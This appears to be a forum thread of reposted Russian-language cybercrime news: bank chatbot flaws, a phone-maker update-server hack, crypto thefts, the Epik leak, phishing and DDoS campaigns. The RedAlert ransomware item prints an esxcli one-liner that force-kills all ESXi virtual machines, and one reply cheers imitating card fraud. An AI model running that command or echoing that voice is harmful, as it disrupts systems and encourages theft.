](https://mega.nz/file/9soEFa7a#dUWeJP71c_wJ8sM-Y0y1L8W_3LwDXzD02v_ZNybQEv0)
mega.nz
anonfiles.com
Checksum: 00047310
Timestamp: 6154F51A (Wed Sep 29 23:22:02 2021 GMT)
Hash (sha256):
49bd8c5cb273e1f15bb27a6bcf6f3da4147d432103d25182b0592518b0071702
News :

Warzone's unreleased RICOCHET Anti-Cheat has already had it's new Kernel Level Driver leaked to cheat providers ahead of it's launch.
 modernwarzone.com

anti-cheat - Charlie INTEL ](https://charlieintel.com/activision-responds-to- cronusmax-concerns-with-new-warzone-ricochet-anti-cheat/140565/)
Activision have responded to concerns that modded controllers such as CronusMAX will make it through their new RICOCHET Warzone anti-cheat.
charlieintel.com
Специалисты обнаружили в банковских чат-ботах уязвимости, которые могут позволить мошенникам переводить деньги без ведома клиентов, пишут «Известия», ссылаясь на Awillix. Как рассказал директор по информационной безопасности компании Александр Герасимов, уязвимости позволяют получить номер и срок действия карт, а также узнать баланс счета и мобильный телефон клиента. Также они позволяют попасть в личный кабинет клиента в чат-боте и обойти механизм подтверждения операции, например, во время перевода денег. При этом аккаунты в мессенджере и на основном сайте банка не связаны между собой: если злоумышленник получит доступ к аккаунту пользователя в чат-боте, это не означает, что он получит доступ к основному личному кабинету, подчеркнул эксперт.
В своих банковских онлайн-приложениях чат-ботов уже запустили ВТБ, Абсолют Банк, Райффайзенбанк, «Открытие», Росбанк, «Хоум Кредит», «ЮниКредит», «Тинькофф», крымский РНКБ, МТС Банк, Почта Банк, сообщили их представители. Однако чат-ботов в крупнейших мессенджерах реализовали ВТБ и Райффайзенбанк, «Абсолют» и Росбанк представили технологию только в WhatsApp. «ЮниКредит» коммуницирует через Viber, но только с МСБ, а Промсвязьбанк ― с этим же сегментом через Telegram. Планируют запустить робота-помощника в чате УБРиР, «Зенит» и «Ренессанс Кредит».
Для обеспечения безопасности Райффайзенбанк позволяет чат-боту присылать персональную информацию только в тех каналах, где пользователь уже прошел аутентификацию как клиент банка ― в приложении банка или в личном кабинете на сайте. Такой же политики придерживаются в «Открытии», «Абсолюте», Росбанке, «ЮниКредите» и ВТБ. В Промсвязьбанке чат-бот для представителей МСБ умеет отвечать на простые вопросы, высылать выписку, выставлять счет и отправлять платеж после авторизации.
По словам руководителя группы исследований безопасности банковских систем Positive Technologies Максима Костикова, проблемы с безопасностью могут позволить получить полный контроль над чат-ботом или доступ к базе данных с информацией о пользователях, загрузке зловредных файлов для рассылок. Также злоумышленник может получить доступ к данным клиента или попытаться инициировать перевод денежных средств. Но в случае перевода он должен будет ввести второй фактор подтверждения операций (обычно это код из СМС или push- уведомления), если эта опция включена в настройках личного кабинета приложения и поддерживается чат-ботом. Если злоумышленник полностью контролирует чат-бот, то его возможности для мошенничества неограниченны, пояснил Костиков.
По его словам, самые популярные сценарии обмана ― изменение функционала чат- бота для сбора информации о человеке, который его использует, рассылка вредоносного программного обеспечения от имени кредитной организации, подмена робота на мошенника во время общения, создание поддельных чат-ботов банков.
• Source: [https://iz.ru/1214668/natalia-ilina...nkovskikh-chat-botakh- pozvoliaiut-krast-dengi](https://iz.ru/1214668/natalia-ilina/obman-po- perepiske-uiazvimosti-v-bankovskikh-chat-botakh-pozvoliaiut-krast-dengi)
Издание The Record сообщает, что смартфоны немецкого производителя Gigaset получили вредоносные обновления, так как неизвестные злоумышленники скомпрометировали сервер обновлений. Нужно сказать, что в начале 2000-х годов эта немецкая компания работала под брендами Siemens Mobile и BenQ-Siemens и была одним из крупнейших производителей мобильных телефонов.
Производитель уже подтвердил факт взлома в беседе с журналистами Heise и BornCity. Gigaset заявила, что проблема в основном затронула старые устройства, которые получили вредоносные обновления прошивки. Более новые модели не пострадали, то есть взлом не коснулся: GS110, GS185, GS190, GS195, GS195LS, GS280, GS290, GX290, GX290 plus, GX290 PRO, GS3 и GS4.
По информации немецких блоггеров, пользователей Twitter и форумов поддержки Google, взлом произошел в прошлую пятницу, 2 апреля 2021 года. Именно тогда пользователи начали сообщать об установке странных приложений, которые быстро разряжали батареи устройств и открывали в браузере сайты с азартными играми и рекламой.
Также устройства пострадавших могли рассылать нежелательные SMS и спам в WhatsApp, из-за чего учетные записи WhatsApp некоторых пользователей заблокировали за подозрительную активность. Некоторые жертвы и вовсе сообщают, что лишились контроля над всеми своими аккаунтами в Facebook.
__https://twitter.com/x/status/1378276431524982784
Журналисты рассказывают, что на смартфоны жертвы были установлены следующие приложения:
• com.yhn4621.ujm0317
• com.yileiya.ayase (Tayase)
• com.wagd.xiaoan (xiaoan)
• com.wagd.smarter (smart)
• com.dolphinstudio.hook
• com.dolphinstudio.taiko
• com.relax.rain
• BBQ Browser
• easenf
У многих пользователей возникли трудности с удалением этих приложений, так как те снова появлялись на устройствах.
Согласно заявлению Gigaset, инцидент затронул не всех пользователей, а лишь тех, кто получил обновления прошивки с одного конкретного сервера. Компания заверяет, что в настоящее время работает «над краткосрочным решением для пострадавших», а также расследует случившееся совместно с ИБ-экспертами и правоохранительными органами.
Источник: xakep.ru/2021/04/07/gigaset-hack/
14 мая злоумышленник начал «выкачивать» средства трейдеров децентрализованной биржи (DEX) Equalizer. Преступник украл 2353 EQUAL (~$20 000) и несколько других токенов.
__https://twitter.com/x/status/1790245836716388554
Команда проекта рекомендовала не взаимодействовать с фронтендом сайта до окончания расследования.
Инцидент начался рано утром с утечки 2500 токенов ликвидности SpookySwap (spLP). Жертва также лишилась других своих средств.
Адрес хакера появился в сети 222 дня назад. Среди украденных монет:
2353 Equalizer (EQUAL);
510 579 FantomStarter (FS);
2 500 spLP;
6 млн AnyInu (AI);
985 565 ChillPill (CHILL);
50 000 WigoSwap (WIGO);
25 multiDEUS (DEUS).
Общая сумма ущерба относительно невелика и оценивается в несколько десятков тысяч долларов. Однако средства пользователей DEX продолжают поступать хакеру.
Параллельно злоумышленник создал поддельную учетную запись Equalizer в X, где предлагалось получить компенсацию.
В Discord-канале команда проекта дала несколько советов пользователям, чтобы остановить дальнейшую потерю средств:
«Если при подключении к децентрализованным приложениям вас попросят одобрить что-либо, немедленно прекратите использование этого сайта. […] Если вас попросят утвердить какой-либо контракт, который неизвестен или отсутствует в наших документах, прекратите использовать этот сайт».
Член сообщества под ником 543 отметил, что пользователи в безопасности, если они «не взаимодействовали с веб-сайтами Equalizer» за несколько часов до инцидента. В ином случае он рекомендовал отозвать все последние разрешения.
Команда биржи в настоящее время «работает над восстановлением основного веб- сайта». До решения проблемы в Equalizer посоветовали использовать альтернативные зеркала.
После 5 месяцев активной разработки была [выпущена](https://www.mail- archive.com/openssl-announce@openssl.org/msg00445.html) новая версия библиотеки OpenSSL 3.3.0, включающую реализацию протоколов SSL/TLS и широкий спектр алгоритмов шифрования. Период поддержки OpenSSL 3.3 продлится до апреля 2026 года. В то же время, предыдущие версии OpenSSL — 3.2, 3.1 и 3.0 LTS — будут поддерживаться до ноября 2025 года, марта 2025 года и сентября 2026 года соответственно. Исходный код проекта доступен под лицензией Apache 2.0.
Основные инновации в обновлении OpenSSL 3.3.0 открывают новые горизонты в защите интернет-соединений. Релиз привносит множество изменений, направленных на повышение производительности и безопасности.
Новые возможности для работы с QUIC:
Улучшения алгоритмов и API:
Оптимизации и безопасность:
Исправления и безопасность:
Обновление несет в себе значительные улучшения для разработчиков и пользователей, укрепляя безопасность и расширяя возможности современных интернет-технологий. Пользователи и разработчики, заинтересованные в использовании новых функций, особенно QUIC, могут найти подробную информацию и примеры использования в соответствующей документации и рекомендациях.
NFT-проект под названием Munchables, созданный на основе Blast, сети второго уровня на базе Эфириума, подвергся эксплойту. Хакеру удалось украсть 17 413 ETH на сумму $62 млн.
Разработчики Munchables объявили в соцсети Х, что их платформа была скомпрометирована. Они отслеживают перемещения средств злоумышленником и «пытаются остановить транзакции». Компания выделила компенсационный пул для пользователей, чтобы они могли вернуть свои средства.
Аналитики DeBank выяснили, что на адресе хакера находилось в общей сложности 17 413 ETH. Затем он перевел эфиры на сумму $10 700 через Orbiter Bridge, сконвертировав ETH Blast в нативные ETH. Позднее он отправил еще 1 ETH на новый адрес.
Независимый «блокчейн-сыщик» ZachXBT предположил, что эксплойт произошел из-за того, что команда Munchables наняла четырех северокорейских разработчиков, использующих псевдонимы NelsonMurua913, Werewolves0493, BrightDragon0719 и Super1114. Аналитик считает, что они связаны с эксплойтом и, скорее всего, являются одним и тем же человеком. Они рекомендовали друг друга работодателю, регулярно проводили платежи на одни и те же два биржевых депозитных адреса и направляли друг другу средства.
Разработчик Solidity, известный как 0xQuit, уверен, что атака на Munchables была запланирована с самого начала. Незадолго до этого один из разработчиков Munchables обновил контракт блокировки токенов непосредственно перед запуском. Проводились проверки, чтобы пользователи не смогли вывести больше средств, чем внесли на депозит. Однако перед обновлением злоумышленник смог установить себе депозит на 1 000 000 эфиров, пояснил 0xQuit.
«Мошенник вручную манипулировал слотами хранения, чтобы выделить себе огромный баланс эфиров, прежде чем изменить смарт-контракт, чтобы все выглядело законным. Затем он просто снял этот баланс, как только общая заблокированная стоимость активов (TVL) стала довольно привлекательной», — предположил 0xQuit.
Одни пользователи обратились к команде Blast с просьбой вмешаться и принудительно откатить сеть до состояния, предшествовавшего эксплойту. Другие выступили против централизованного вмешательства.
Агентство финансового мониторинга (АФМ) Казахстана завершило расследование в отношении крупного криптовалютного обменника, общий объем средств в котором превысил 15 млрд тенге ($33,2 млн).
Как сообщило АФМ, Кучуков А.В. и Садыров Е.Т основали крупный нелегальный сервис по обмену криптовалют на наличные деньги. За обмен цифровых активов они брали от 1,5% до 2,5% комиссии. В рамках расследования полицейским удалось конфисковать $22 894,5 в USDT, $328 000 наличными и около 7 млн тенге.
Суд приговорил Кучукова к лишению свободы сроком на 3 года с конфискацией имущества, а Садырова — на 2 года и 6 месяцев с конфискацией имущества.
В декабре по аналогичному обвинению был арестован другой житель Астаны. Он ежедневно осуществлял обмен криптовалют, а общая сумма операций превысила 342 млн тенге ($745 000).
Google Cloud объявил о запуске нового инструмента для борьбы с отмыванием денег на основе искусственного интеллекта. Новый сервис предназначен для анализа операций и поведения клиентов, позволяя обнаруживать подозрительные действия и предотвращать финансовые преступления.
Google Cloud запустил новый продукт, который поможет финансовым учреждениям эффективнее бороться с отмыванием денег. В этом им поможет ИИ. Новый продукт под названием "Google Cloud AML" является облачной платформой. Этот сервис анализирует операции и поведение клиентов, что позволяет обнаруживать подозрительные действия и предотвращать финансовые преступления.
Сервис использует методы машинного обучения для анализа данных клиентов банка. Он распознает типичные паттерны транзакций, поведение пользователей и идентификационные данные. Искусственный интеллект анализирует эти данные и выявляет операции, которые могут представлять высокий риск.
Разработчики Google Cloud AML подчеркнули, что их система обеспечивает значительное улучшение процесса выявления отмывания денег, который может быть выполнен до 2-4 раз быстрее и эффективнее, чем при использовании существующих внутренних инструментов банков и смежных структур.
Google Cloud AML уже получил положительные отзывы от партнеров и клиентов, в числе которых крупный европейский банк ING. По словам представителей банка, новый сервис помог ускорить процесс обнаружения отмывания денег и снизить количество ложных срабатываний на 20%. Сервис уже доступен для заказа с 21 июня текущего года.
Financial Institutions ](https://www.googlecloudpresscorner.com/2023-06-21-Google-Cloud-Launches-AI- Powered-Anti-Money-Laundering-Product-for-Financial-Institutions)
HSBC found AML AI identified 2-4x more suspicious activity, while reducing alert volumes by more than 60% SUNNYVALE, Calif., June 21, 2023 /PRNewswire/ -- Google Cloud today announced the launch...
 www.googlecloudpresscorner.com
RedAlert позволяет отключить все работающие VM перед шифрованием файлов.
Специалисты из MalwareHunterTeam обнаружили новую вымогательскую кампанию, направленную на корпоративные сети. Операторы вымогательского ПО шифруют серверы VMware ESXi на Windows и Linux. Специалисты назвали вредонос Red Alert, основываясь на строке, найденной в записке с требованием выкупа. Операция носит название “N13V” – так ее называют сами вымогатели.
Параметры командной строки и название хакерской операции, найденные в шифровальщике.
RedAlert был создан для атак на серверы VMware ESXi. У вредоноса есть особенность - он позволяет взаимодействовать с командной строкой, благодаря чему хакеры могут отключать все работающие виртуальные машины перед шифрованием файлов. Полный список команд приведен ниже:
Code:Copy to clipboard
-w Run command for stop all running VM`s
-p Path to encrypt (by default encrypt only files in directory, not include subdirectories)
-f File for encrypt
-r Recursive. used only with -p ( search and encryption will include subdirectories )
-t Check encryption time(only encryption, without key-gen, memory allocates ...)
-n Search without file encryption.(show ffiles and folders with some info)
-x Asymmetric cryptography performance tests. DEBUG TESTS
-h Show this message
Подробнее: https://www.securitylab.ru/news/532660.php
При запуске вредоноса с параметром “-w” шифратор завершает работу всех виртуальных машин VMware ESXi с помощью следующей команды:
Code:Copy to clipboard
esxcli --formatter=csv --format-param=fields=="WorldID,DisplayName" vm process list | tail -n +2 | awk -F $',' '{system("esxcli vm process kill --type=force --world-id=" $1)}'
При шифровании файлов RedAlert использует алгоритм шифрования NTRUEncrypt . Интересной особенностью вредоноса является функция, вызываемая параметром ‘'-x' в командной строке. Эта функция выполняет тестирование производительности асимметричной криптографии, используя разные наборы параметров NTRUEncrypt.

Тест скорости шифрования NTRUEncrypt.
При шифровании вредонос выбирает только логи, файлы подкачки, виртуальные диски и память:
Code:Copy to clipboard
.log
.vmdk
.vmem
.vswp
.vmsn
К зашифрованным файлам добавляется расширение .crypt658. Кроме этого, RedAlert создает в каждой папке записку с именем HOW_TO_RESTORE, которая содержит описание украденных данных и ссылку на уникальный TOR-сайт для оплаты выкупа.

Так выглядит записка, которую оставляет RedAlert.
N13V принимает к оплате только криптовалюту Monero , которая обычно не
продается на криптобиржах США, поскольку является монетой конфиденциальности.
source: twitter.com/malwrhunterteam/status/1544387107577335813
Злоумышленников, львовян в возрасте 34 и 36 лет, разоблачили оперативники Управления противодействия киберпреступлениям во Львовской области совместно со следователями отдела полиции № 1 Львовского районного управления полиции № 1, под процессуальным руководством Галицкой окружной прокуратуры.
Как установили правоохранители, подозреваемые для продажи создавали в сети Интернет фишинговые сайты и вредоносное программное обеспечение, предназначенное для несанкционированного вмешательства в работу информационных (автоматизированных) систем и которое давало доступ к персональным данным граждан.
Следователи сообщили злоумышленникам о подозрении в совершении уголовного правонарушения, предусмотренного ч.1 ст.361-1 (Создание с целью противоправного использования, распространения или сбыта вредоносных программных или технических средств, а также их распространение или сбыт) Уголовного кодекса Украины. Максимальное наказание, которое грозит подозреваемым - лишение свободы на срок до трех лет.
Досудебное расследование продолжается.
lv.npu.gov.ua/news/u-lvovi-pravookhorontsi-vykryly-dvokh-brativ-iaki- stvoriuvaly-dlia-prodazhu-fishynhovi-saity
Суд в Волгограде вынес приговор троим участникам преступной группы по уголовному делу о незаконной банковской деятельности и легализации преступных доходов на 100 млн рублей. Об этом сообщила старший помощник руководителя следственного управления СК России по Волгоградской области Дарья Буянова.
"Собранные следственными органами Следственного комитета РФ по Волгоградской области доказательства признаны судом достаточными для вынесения приговора в отношении троих членов организованной группы. <…> Приговором суда виновным назначено наказание в виде лишения свободы сроком от двух до четырех лет, а также штрафов в доход государства в размере от 200 до 300 тыс. рублей", - сказала Буянова.
Она добавила, что в ходе расследования уголовного дела один из соучастников полностью признал свою вину в содеянном и заключил досудебное соглашение о сотрудничестве, уголовное дело в отношении него было выделено в отдельное производство.
В декабре 2020 года волгоградские следователи возбудили уголовное дело в отношении четверых членов организованной группы, подозреваемых в незаконной банковской деятельности на 100 млн рублей. По данным следствия, суть их преступной схемы заключалась в осуществлении финансовых переводов между юридическими или физическими лицами, выдаче наличных денежных средств, а также открытии и ведении счетов. Для этого подозреваемые создали несколько фиктивных организаций, реквизиты и печати которых впоследствии использовали для составления необходимых документов, обосновывающих проведение той или иной финансовой операции.
source: tass.ru/proisshestviya/14205865
Федеральный судья в США подписал ордер на выведение более $600 тыс. в биткойнах из криптовалютного кошелька Huobi Global после того, как было установлено, что эти деньги являются частью $11,6 млн, похищенных у Coinbase, пишет Business Insider.
Как сообщается в заявлении прокуратуры Лос-Анджелеса, поданном в окружной суд Калифорнии в сентябре, в апреле 2021 года пользователь Coinbase (некто G.R.) приобрел 200 биткойнов, после чего увидел на экране поддельное уведомление о том, что его учетная запись была заблокирована. Уведомление было якобы от Coinbase, но на самом деле являлось первым шагом в мошеннической схеме, в итоге завершившейся выведением из учетной записи $11,6 млн в криптовалюте (206 биткойнов).
Каким образом мошенники узнали о транзакции через Coinbase, непонятно. Также неясно, где отображалось поддельное уведомление, на телефоне или ПК.
Согласно заявлению прокуратуры, получив уведомление, G.R. позвонил по указанному телефонному номеру. На звонок ответил "неизвестный 1" и попросил потерпевшего внести изменения в своей учетной записи, в частности, разрешить удаленный доступ к ней.
Получив доступ к учетной записи потерпевшего, "неизвестный 1" повысил суточный лимит на перевод денег и попытался отключить определенные уведомления и предупреждения. Затем злоумышленник вывел миллионы долларов в биткойнах и XLM через серию транзакций между несколькими кошельками. Около 10,2 биткойна в итоге оказались в кошельке одной из крупнейших мире криптовалютных бирж Huobi Global.
Сотрудники правоохранительных органов подали уведомление о конфискации похищенной криптовалюты. Huobi Global пока никак не комментирует данный факт.
В начале октября 2021 года судья Долли Джи (Dolly M. Gee) одобрила запрос на получение ордера. Также было опубликовано уведомление для других пострадавших на случай, если они также захотят истребовать свои деньги назад.
"Huobi согласилась заморозить средства до разрешения иска о конфискации. Никто пока не был арестован или обвинен, но расследование продолжается", - сообщил директор по связям со СМИ прокуратуры Лос-Анджелеса Том Мрозек (Thom Mrozek).
Как сообщалось в октябре, в период с марта по май нынешнего года Coinbase пострадала от крупномасштабной атаки. В результате инцидента была похищена криптовалюта из 6 тыс. кошельков.

Anonymous "пресс-релиз", объявляющий об утечке данных Epik
Более 15 миллионов адресов электронной почты и сопутствующих личных данных просочились в сеть под лозунгом Anonymous.
Вся просочившаяся информация предположительно исходит от компании Epik,
регистратора доменных имен и веб-хостинга в Белвью, штат Вашингтон, на которую
на прошлой неделе напал анонимный коллектив хактивистов. Просочившаяся
информация, включающая 180 ГБ данных, включает не только информацию о
собственных клиентах и системах Epik, но также сведения о миллионах других лиц
и организаций, чья информация была извлечена с помощью запросов «Whois» от
регистраторов доменных имен, согласно свободному нарушению. - служба
уведомлений Have I Been Pwned, получившая набор открытых данных.
«Данные включали более 15 миллионов уникальных адресов электронной почты
(включая анонимные версии для обеспечения конфиденциальности домена), имена,
номера телефонов, физические адреса, покупки и пароли, хранящиеся в различных
форматах», - сообщает Have I Been Pwned.
Сервис, поддерживаемый австралийским разработчиком Троем Хантом, позволяет
пользователям регистрироваться, используя адрес электронной почты, а затем
связываться с ними всякий раз, когда этот адрес появляется в свалке взломанных
данных. На прошлой неделе Хант спросил пользователей, следует ли ему загружать
информацию, полученную из Whois, в Have I Been Pwned, и подавляющее
большинство респондентов попросили его сделать это.
__https://twitter.com/x/status/1439007532287082496
Epik, основанная в 2009 году нынешним генеральным директором Робом Монстром,
предоставляла услуги хостинга для ряда ультраправых сайтов, включая Texas GOP,
Parler, 8chan, Gab и BitChute.
Epik позиционирует себя как «швейцарский банк доменов», предоставляя «всем
зарегистрировавшимся доступ к современной системе безопасности доменов» с
«интегрированными услугами по обеспечению конфиденциальности Whois», которые
«предоставляются регистрантам бесплатно».
Однако из-за взлома клиенты, которые ожидали, что их личность будет храниться
в секрете, могут быть удивлены.
В «пресс-релизе», выпущенном одним или несколькими лицами, действующими под
эгидой Official Anonymous, которые объявляют себя «хакерами эстрадиола»,
говорится, что они «утекли данные компании за десятилетие», что составляет
гигабайты данных. которые включают «учетные данные для всех клиентов Epik,
хостинг, анонимность VPN и т. д.», а также для различных систем Epik,
серверов, пароли GoDaddy и т. д., которые, как он утверждает, в основном
хранились в виде открытого текста, хотя некоторые из них были хешированы, хотя
и в виде несоленых хешей MD5, которые легко взломать.
Почему был выбран Epik
Новость о взломе впервые была опубликована 13 сентября через Twitter
независимым техасским журналистом Стивеном Монацелли, который опубликовал
сообщение от Anonymous, в котором подробно описаны мотивы злоумышленников для
удара по Epik в рамках его усилий "#OperationJane".
Атака на Epik, по-видимому, сосредоточена на предоставлении услуг хостинга для
веб-сайта Республиканской партии штата Техас и других групп, связанных со
спорным новым законом Техаса об абортах, известным как Сенатский закон № 8,
также известный как «Закон о сердцебиении».
Анонимный пресс-релиз, объявляющий о взломе Epik (Источник: архивная копия;
нажмите, чтобы увеличить)
Закон, вступивший в силу 1 сентября, запрещает аборты после шести недель
беременности. Это также дает жителям штата возможность подавать в суд на
любого, кто нарушает или помогает другим нарушать закон.
Сообщается, что Anonymous просочились во вторник, после чего данные начали
быстро распространяться по ссылкам BitTorrent.
Epik не сразу ответил на запрос о комментарии. Но ранее компания отрицала
наличие каких-либо доказательств того, что она была взломана. «Нам не известно
о каких-либо нарушениях. Мы очень серьезно относимся к безопасности данных
наших клиентов и расследуем обвинения», - сказал Ars Technica представитель
Epik.
В ответ Anonymous изменили базу знаний Epik, чтобы отчасти читать: «13
сентября 2021 года группа детей, называющих себя« Анонимами », о которых мы
никогда не слышали, заявила, что им удалось [d] связаться с: ну, честно
говоря, все наши данные, а потом обнародованы », судя по архивной копии
измененной страницы. «Они утверждают, что в него включены все пользовательские
данные. Все это. Все имена пользователей, пароли, электронные письма, запросы
в службу поддержки, нарушение всех наших служб анонимизации. Конечно, это
неправда. Мы не такие глупые». Я позволю этому случиться ".
Страница, которая с тех пор была удалена Epik, заканчивалась замечанием
Anonymous: «Мы написали это сами, это, очевидно, не является частью взломанной
учетной записи».
Техасская Республиканская партия Rick-Rolled
11 сентября Anonymous изменили веб-сайт Республиканской партии штата Техас,
изменив слоган с «Помогите сохранить красный цвет Техаса» на «Техас: забирая
голоса у женщин для содействия теократическому разрушению церковных /
государственных барьеров», как сообщает Daily Dot.
На главную страницу также была добавлена кнопка для пожертвования программе
Planned Parenthood, а также ссылка на YouTube на песню Рика Эстли «Never Gonna
Give You Up».
С тех пор веб-сайт Республиканской партии штата Техас был восстановлен с
заявлением, подтверждающим, что он был испорчен. «Мы смогли защитить наш веб-
сайт, но не ошиблись, подобные угрозы и атаки только укрепляют нашу
решимость», - говорится в сообщении.
Источник: <https://www.govinfosecurity.com/web-hoster-epiks-breach- exposes-15-million-email-addresses-a-17572>
TAIPEI (Тайваньские новости) - Тайбэйский бренд ПК Acer в понедельник (18 октября) подтвердил кибератаку на свои серверы на Тайване после аналогичной атаки на его офис в Индии менее чем за неделю, сообщает ZDNet.
Группа Desorden взяла на себя ответственность за обе атаки, заявив, что во время взлома серверов Acer в Индии 13 октября была взята часть данных, связанных с данными о сотрудниках. Группа якобы похитила более 60 ГБ файлов и баз данных, сообщает Privacy Affairs.
На острове Бали, Индонезия иммиграционные власти страны задержали 103 гражданина Тайваня, которых подозревают в организации киберпреступной деятельности.
Сотрудники иммиграционной службы провели рейд на вилле, где арестовали 12 женщин и 91 мужчину, у которых было изъято множество мобильных телефонов и других электронных устройств. Помимо онлайн-мошенничества, подозреваемые также нарушали условия виз. Арестованные будут депортированы из страны.
Полиция Индонезии не может предъявить обвинения арестованным, поскольку предполагаемые преступления выходят за пределы юрисдикции страны и были направлены против лиц в других странах. Однако правоохранители тесно сотрудничают с соответствующими органами, в том числе с малайзийскими.
Фотографии задержанных, предоставленные полицией
Индонезия продолжает расследование, чтобы установить, связана ли группа с международными преступными синдикатами. МИД Тайваня сообщило, что из 103 задержанных только 14 являются были гражданами Тайваня. Расследование продолжается.
Неясно, совершали ли подозреваемые предполагаемые киберпреступления против своей воли — так называемое киберрабство стало распространенной проблемой по всей Юго-Восточной Азии, где образованные и хорошо владеющие компьютером молодые люди, претендующие на высокооплачиваемую работу, в конечном итоге вынуждены заниматься кибермошенничеством.
kompas.id/baca/nusantara/2024/06/27/diduga-terlibat-kejahatan-siber-103-warga-
negara-asing-ditangkap-di-bali
instagram.com/accounts/login/?next=https%3A%2F%2Fwww.instagram.com%2Fp%2FC8vhLbtSaAF%2F&is_from_rle
Эксперты по кибербезопасности из компании nao-sec обнаружили масштабную кампанию кибератак, направленную на правительственные организации Тайваня. За атаками, как сообщается, стоит китайская хакерская группа, отслеживаемая специалистами под кодовым названием «GroundPeony». Группировка имеет очень много сходств с киберпреступной группой «UNC33471», поэтому, вполне вероятно, речь идёт об одних и тех же хакерах.
Цепочка атаки GroundPeony
В большинстве атак GroundPeony использует уязвимость CVE-2022-30190 под кодовым названием Folina. Цепочка атаки начинается с отправки фишингового электронного письма с вложенным DOC-файлом. В качестве темы своих фишинговых писем хакеры GroundPeony использовали морское сообщение между Тайванем и США, чтобы сделать их более убедительными для жертвы.
Безобидное вложение с «сюрпризом» внутри
При запуске прикреплённого файла потенциальная жертва видит оповещение об ошибке, что содержимое файла нельзя просмотреть без установки специального обновления. В этом же «оповещении» содержится ссылка на якобы официальный сайт Microsoft, откуда можно загрузить нужное обновление. Но по факту, каталог принадлежит мошенникам, а для маскировки URL-адреса хакеры использовали сервис сокращения ссылок Cuttly.
Ссылка, ведущая на архив с вредоносным ПО
Загруженный ZIP-архив содержит исполняемый EXE-файл и DLL-библиотеку для заражения компьютера вредоносным ПО. Запуск программы открывает злоумышленникам канал, по которому они способны доставить на скомпрометированное устройство любую полезную нагрузку, будь то инфостилеры, программы-вымогатели, вайперы и прочие вредоносные программы.
Анализ технических деталей атак показал, что группа GroundPeony действует с 2021 года и нацелена в первую очередь на правительственные организации Тайваня и Непала. Эксперты полагают, что хакеры обладают высоким уровнем мастерства и доступом к 0-day уязвимостям.
Специалистам кибербезопасности, чьи организации находятся в зоне риска, рекомендуется усилить меры защиты от фишинга и тщательно проверять подозрительные файлы и ссылки. Однако лишь повышенная бдительность поможет точно не стать жертвой хитроумных мошенников.
Полицейское управление города Маунт-Лорел (штат Нью-Джерси) обратилось к широкой общественности с просьбой оказать содействие в поимке преступника. По данным следователей, он попытался ([https://www.msn.com/en- us/news/crim...p-gym-tried-buying-23k-rolex-mlpd/ar- AA1eixIj](https://www.msn.com/en-us/news/crime/man-used-stolen-credit-card- from-township-gym-tried-buying-23k-rolex-mlpd/ar-AA1eixIj)) купить дорогие часы, расплатившись украденной кредитной карточкой.
Подозреваемый, по предварительной информации, пытался использовать кредитку, которая была украдена из спортивного клуба Lifetime Fitness, расположенного в Маунт-Лорел. Саму же покупку он едва не совершил в соседней Филадельфии (штат Пенсильвания). Речь в этом случае идет о Rolex, стоимостью 23 тысячи долларов.
Теперь полицейское управление просит отозваться всех, кто знает человека, попавшего при покупке часов на камеры видеонаблюдения.
Схожий почерк был у преступлений, которые пытаются распутать силовики штата Техас. Там грабитель украл у жертвы его кредитку и сим-карту из телефона, когда та занималась в спортзале. Вскоре после этого со счета потерпевшего стали пропадать деньги. Суммарно в течение 70 минут после кражи мошенник потратил на дорогие часы 74 тысячи долларов.
Если смог он , чем мы плохи))
Компания Unciphered, работающая в сфере информационной безопасности, сообщила, что смогла взломать популярный аппаратный кошелек Trezor Model T и получить закрытый ключ.
В демонстрационном видео специалисты Unciphered используют некую «аппаратную уязвимость» в кошельке Model T. В видео показано, как вычленяется мнемоническая фраза для доступа. При этом для взлома нужен физический доступ к кошельку.
Команда стартапа исследовала и разработала метод по использованию «внутренней уязвимости» кошелька. Данная уязвимость позволила извлечь прошивку устройства. Затем с помощью специализированного ПО и мощностей видеоускорителей им удалось взломать пин-код устройства.
«Мы загрузили полученную прошивку в наши высокопроизводительные вычислительные кластера для взлома. У нас есть около 10 GPU, которые работали над этой задачей, и спустя определенное время мы получили ключи», ― рассказал сооснователь Unciphered Эрик Мишо (Erik Michaud).
Мишо также отметил, что программными методами данную уязвимость в Trezor Model T исправить невозможно. Производителю придется отозвать все проданные аппаратные кошельки для устранения уязвимости.
Представители Trezor сообщили, что им известна данная уязвимость и она называется Read Protection Downgrade (RDP). Ее обнаружили еще в 2020 году, но для ее использования нужен физический доступ к устройству, и «крайне глубокие технологические познания, а также сложное оборудование».
«Даже при наличии таких знаний и оборудования, можно установить сложную парольную фразу, которая позволит добавить дополнительный уровень защиты и сделает атаку через RDP бесполезной», ― заявил технический директор Trezor Томаш Сушанка (Tomas Susanka).
В апреле сообщалось, что аппаратный кошелек Trezor Model T получит функции анонимизации транзакций.
DDoS-атака будет продолжаться до тех пор, пока Литва не снимет блокаду
Калининграда
21 июня российские хакеры Killnet атаковали литовские государственные и частные веб-сайты . Атака была местью за решение Вильнюса прекратить транзит некоторых товаров в Калининград.
Налоговый орган Литвы заявил, что остановил всю деятельность из-за большого количества попыток подключения к своим системам. «Основными целями оказались госучреждения, транспортные учреждения, веб-сайты СМИ», — сказал заместитель министра обороны Маргирис Абукявичюс.
« DDoS-атака будет продолжаться до тех пор, пока Литва не снимет блокаду. Мы уничтожили 1652 веб-ресурса. И это только начало», — заявила группировка Killnet.
«Вполне вероятно, что в ближайшие дни атаки аналогичной или большей интенсивности будут продолжаться, особенно в транспортном, энергетическом и финансовом секторах», — говорится в заявлении Литовского национального центра кибербезопасности. По данным центра, пострадала и защищенная сеть, используемая государственными учреждениями.
Минчанин задержан по подозрению в кибермошенничестве. Об этом БЕЛТА сообщили в ГУВД Мингорисполкома.
"В Партизанское РУВД столицы обратились граждане и рассказали, что стали жертвами кибермошенника. Установлено, что заявители искали в интернете информацию об оформлении онлайн-кредитов. Затем с ними связывался 30-летний минчанин, который обещал оказать помощь в этом вопросе, для чего просил сообщить ему паспортные данные и коды, которые приходили потерпевшим в СМС- сообщениях. После получения информации подозреваемый создавал учетные записи и оформлял на заявителей онлайн-кредиты", - рассказали в ГУВД.
После того как банки одобряли заявки на получение кредитов, минчанин переводил все денежные средства на подконтрольные ему счета. Полученные деньги мужчина тратил на личные нужды.
Подозреваемый задержан, правоохранители установили его причастность к аналогичным преступлениям, совершенным в столице. Окончательная сумма ущерба, причиненного в результате противоправных действий, устанавливается. Возбуждено уголовное дело по факту хищения имущества путем модификации компьютерной информации.
